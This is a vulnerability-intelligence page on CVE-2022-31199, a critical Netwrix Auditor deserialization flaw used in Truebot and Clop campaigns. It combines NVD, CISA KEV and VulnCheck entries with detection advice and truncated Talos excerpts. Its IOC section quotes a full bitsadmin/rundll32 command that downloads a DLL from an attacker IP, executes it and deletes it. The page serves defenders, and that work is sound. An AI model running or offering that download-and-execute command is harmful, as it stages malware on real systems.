CVE-2022-31199
published 2022-11-08CVE-2022-31199: Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents…
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-08-01
Exploited in the wild
EPSS
36.15%
98.3th percentile
Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netwrix | auditor | < 10.5 | 10.5 |
Detection & IOCsextracted from sources · hover to see the quote
commandC:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\ProgramData\msruntime.dll&rundll32 /S c:\ProgramData\msruntime.dll,fff&del c:\ProgramData\msruntime.dll↗
- →Monitor UAVRServer.exe for spawning cmd.exe or bitsadmin child processes, which indicates exploitation of CVE-2022-31199 and subsequent Truebot payload staging. ↗
- →Alert on bitsadmin transfers initiated by UAVRServer.exe dropping DLLs into C:\ProgramData\ followed by rundll32 execution — the observed post-exploitation pattern for this CVE. ↗
- →Block or alert on inbound connections to TCP port 9004 from untrusted sources; this is the vulnerable .NET remoting service port exploited by CVE-2022-31199. ↗
- ·The vulnerable .NET remoting service (port 9004/TCP) is typically not internet-exposed; exploitation is most likely from an attacker already on the internal network or in cases where the Netwrix server is directly internet-facing with no firewall. ↗
- ·Exploitation grants NT AUTHORITY\SYSTEM privileges and, because Netwrix Auditor typically runs with extensive AD privileges, successful exploitation likely leads to full Active Directory domain compromise. ↗
- ·The vulnerability is an insecure .NET object deserialization issue via an unsecured .NET remoting service; arbitrary objects can be submitted to achieve RCE. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c3rc-wfgg-r544: Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server a
ghsa_unreviewed·2022-11-08
CVE-2022-31199 [CRITICAL] CWE-502 GHSA-c3rc-wfgg-r544: Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server a
Remote code execution vulnerabilities exist in the Netwrix Auditor User Activity Video Recording component affecting both the Netwrix Auditor server and agents installed on monitored systems. The remote code execution vulnerabilities exist within the underlying protocol used by the component, and potentially allow an unauthenticated remote attacker to execute arbitrary code as the NT AUTHORITY\SYSTEM user on affected systems, including on systems Netwrix Auditor monitors.
VulnCheck
Netwrix Auditor Insecure Object Deserialization Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-31199 [CRITICAL] CWE-502 Netwrix Auditor Insecure Object Deserialization Vulnerability
Netwrix Auditor Insecure Object Deserialization Vulnerability
Netwrix Auditor User Activity Video Recording component contains an insecure objection deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.
Affected: Netwrix Auditor
Required Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/; https://heimdalsecurity.com/blog/clop-ransomware-uses-viral-truebot-malware-to-access-n
CISA
Netwrix Auditor Insecure Object Deserialization Vulnerability
cisa·2023-07-11·CVSS 9.8
CVE-2022-31199 [CRITICAL] CWE-502 Netwrix Auditor Insecure Object Deserialization Vulnerability
Vulnerability: Netwrix Auditor Insecure Object Deserialization Vulnerability
Affected: Netwrix Auditor
Netwrix Auditor User Activity Video Recording component contains an insecure objection deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.
Required Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.
Notes: Patch application requires login to customer portal: https://security.netwrix.com/Account/SignIn?ReturnUrl=%2FAdvisories%2FADV-2022-003; https://nvd.nist.gov/vuln/detail/CVE-2022-31199
Remediation Due Date: 202
No detection rules found.
No public exploits indexed.
Talos
Breaking the silence - Recent Truebot activity
blogs_talos·2022-12-08
Breaking the silence - Recent Truebot activity
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot was first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible for several high-impact attacks on financial institutions in several countries around the world.
There are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka Evil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.
Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques. In August, we saw a small numbe
Talos
Breaking the silence - Recent Truebot activity
blogs_talos·2022-12-08
Breaking the silence - Recent Truebot activity
## Breaking the silence - Recent Truebot activity
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot was first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible for several high-impact attacks on financial institutions in several countries around the world.
There are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka Evil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.
Recently, the attackers have shifted from using malicious emails as their primary delivery method t
2022-11-08
Published
2023-07-11
Added to CISA KEV
Exploited in the wild